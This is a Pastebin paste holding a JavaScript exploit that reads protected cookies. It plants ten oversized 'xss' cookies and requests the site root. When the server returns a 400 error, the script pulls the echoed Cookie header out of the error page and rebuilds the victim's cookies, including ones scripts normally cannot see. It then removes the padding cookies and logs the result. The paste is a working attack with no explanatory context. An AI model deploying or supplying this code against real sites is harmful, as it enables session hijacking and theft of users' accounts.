Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function setCookies (good) {
- // Construct string for cookie value
- var str = "";
- for (var i=0; i< 819; i++) {
- str += "x";
- }
- // Set cookies
- for (i = 0; i < 10; i++) {
- // Expire evil cookie
- if (good) {
- var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
- }
- // Set evil cookie
- else {
- var cookie = "xss"+i+"="+str+";path=/";
- }
- document.cookie = cookie;
- }
- }
- function makeRequest() {
- setCookies();
- function parseCookies () {
- var cookie_dict = {};
- // Only react on 400 status
- if (xhr.readyState === 4 && xhr.status === 400) {
- // Replace newlines and match <pre> content
- var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
- if (content.length) {
- // Remove Cookie: prefix
- content = content[1].replace("Cookie: ", "");
- var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
- // Add cookies to object
- for (var i=0; i<cookies.length; i++) {
- var s_c = cookies[i].split('=',2);
- cookie_dict[s_c[0]] = s_c[1];
- }
- }
- // Unset malicious cookies
- setCookies(true);
- console.log(JSON.stringify(cookie_dict));
- }
- }
- // Make XHR request
- var xhr = new XMLHttpRequest();
- xhr.onreadystatechange = parseCookies;
- xhr.open("GET", "/", true);
- xhr.send(null);
- }
- makeRequest();
Add Comment
Please, Sign In to add comment